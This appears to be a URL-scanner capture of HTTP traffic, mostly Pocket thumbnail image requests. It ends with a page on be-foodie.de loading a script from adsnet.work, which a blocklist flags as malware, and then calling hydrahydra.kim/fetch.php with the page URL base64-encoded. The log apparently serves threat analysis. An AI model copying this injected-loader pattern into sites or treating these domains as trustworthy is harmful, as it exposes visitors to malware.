HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 4309
x-amzn-requestid: a22b4d7e-e208-4bda-81c2-d13e6463380e
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: blE0hGNioAMF_Tg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6371e81c-1b13846866f56a0e47675e56;Sampled=0
x-amzn-remapped-date: Mon, 14 Nov 2022 07:02:52 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: 0sYKpJWi2Tv9Atz3PYXm5j7kmncAOxjcLcK4hgAkJ5b4pNMDmjdB6g==
via: 1.1 ddd913fbbe7367d44af4ac06097e7a2a.cloudfront.net (CloudFront), 1.1 28390a4d24ed4fdccd685d99cd06cf4e.cloudfront.net (CloudFront), 1.1 google
date: Thu, 24 Nov 2022 07:14:07 GMT
age: 36109
etag: "126771b86638108050cf57c0d12faa27f80f0edb"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   4309
Md5:    841a4b110022a99ddea6f7bf66df0fa1
Sha1:   126771b86638108050cf57c0d12faa27f80f0edb
Sha256: 240fbffc1f9104433297d3ff7afba2d0b58d7f1b13d9a9260a1bad25216665db
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fca5cb469-21a0-420a-875c-a81635b33f53.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7993
x-amzn-requestid: 9f0ff853-4819-47cd-959d-658401ea5748
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cEvCsG5mIAMFqAQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637e9211-1c48b9223684f2942f8dd42d;Sampled=0
x-amzn-remapped-date: Wed, 23 Nov 2022 21:35:13 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: 7YSXUV-LZpsI7vciFhuqt1EVr6YRkhxcOgMg8z8bxLcOE01_baf6Gg==
via: 1.1 d1151317ba32afe0e6370fd69fed222e.cloudfront.net (CloudFront), 1.1 1b74ccf4cb51eacf97a0e6d60ae46a3e.cloudfront.net (CloudFront), 1.1 google
date: Wed, 23 Nov 2022 21:47:06 GMT
etag: "43d1dec7fc06879988c9c3cadd800cc8145df988"
age: 70130
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7993
Md5:    92c78302bcce1568eb6a5563100b932c
Sha1:   43d1dec7fc06879988c9c3cadd800cc8145df988
Sha256: 0dda9914306c8e3a7ea75eade8e762652d93907dd6c5a8cc81707d6d8098b60a
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F81517ad5-7c1b-49aa-9ba9-dbfa36fbb071.webp HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 13882
x-amzn-requestid: 9022b0b3-31d5-4149-a969-02514f11b95a
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cEvzNHjMoAMFWMg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637e9347-0e8354a02bef623644714e31;Sampled=0
x-amzn-remapped-date: Wed, 23 Nov 2022 21:40:23 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: ve4q5FDkwMGhPK6ZVVVCZtoBTaGaz43r_PwINzwS5Nx5tcZeQkVIfw==
via: 1.1 000f4a2f631bace380a0afa747a82482.cloudfront.net (CloudFront), 1.1 ce71f64ad5dca81beca846466f2d5008.cloudfront.net (CloudFront), 1.1 google
date: Wed, 23 Nov 2022 21:49:47 GMT
age: 69969
etag: "1102dbdcbcabf5c25d17840f8f00d5b55b9b8f0a"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   13882
Md5:    64d79191f005c9876b952c5f948aa0f7
Sha1:   1102dbdcbcabf5c25d17840f8f00d5b55b9b8f0a
Sha256: 00fb36c3d322e8302c5ce202d6d4119d637510cd6f3b63e1347781ec3bb9d7fc
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F3d85d03d-8fcf-42f4-bada-e7f488f04307.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7462
x-amzn-requestid: 1f6fb14d-83e0-43d3-9dab-5bc83af1a7c4
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cEwV3HV9oAMFs9w=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637e9425-634d43db6308e0be596aa5a0;Sampled=0
x-amzn-remapped-date: Wed, 23 Nov 2022 21:44:05 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: GW5UTfY7-TwPWTno9z1e21a2cA9fmU7GfHFYWdL-zQvMLxeq-S9Trg==
via: 1.1 e291f351a18746d40754b367095a2872.cloudfront.net (CloudFront), 1.1 e66162aafd55b64ba1478ff7105150fa.cloudfront.net (CloudFront), 1.1 google
date: Wed, 23 Nov 2022 22:03:54 GMT
age: 69122
etag: "a7d9135f9d01ba13c3cdaf8b038c70212f159297"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7462
Md5:    b4157f2c5c3c77ce699324ecb08f47c7
Sha1:   a7d9135f9d01ba13c3cdaf8b038c70212f159297
Sha256: 2305f7afee95bb34d9e8dbff571c6b146ba7b694be96e9e925c32d1f41785916
                                        
                                            GET /scripts/placer.js HTTP/1.1 
Host: adsnet.work
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://be-foodie.de/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         193.3.19.36
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Thu, 24 Nov 2022 17:15:55 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/7.4.26
Access-Control-Allow-Origin: *
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  ASCII text
Size:   377
Md5:    4435b6168b6acda2edea1c16ab2d857a
Sha1:   eff2c42517e44a568b5011125b5cba022f27f67f
Sha256: dcd5ff0b5118befd94a04b7bbc750b5a7b473e39fefd81e235f79bd848916569

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /fetch.php?tracker=adsnet.work&site=aHR0cDovL2JlLWZvb2RpZS5kZS9ibG9nLzIwMTEvMDkvdm9uLXdlZ2VuLXZpZWxlLWtvY2hlL3Zvbl93ZWdlbl92aWVsZV9rb2VjaGUtNC8= HTTP/1.1 
Host: hydrahydra.kim
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/

search
                                         193.3.19.36
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Thu, 24 Nov 2022 17:15:58 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/7.4.26
Access-Control-Allow-Origin: *
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked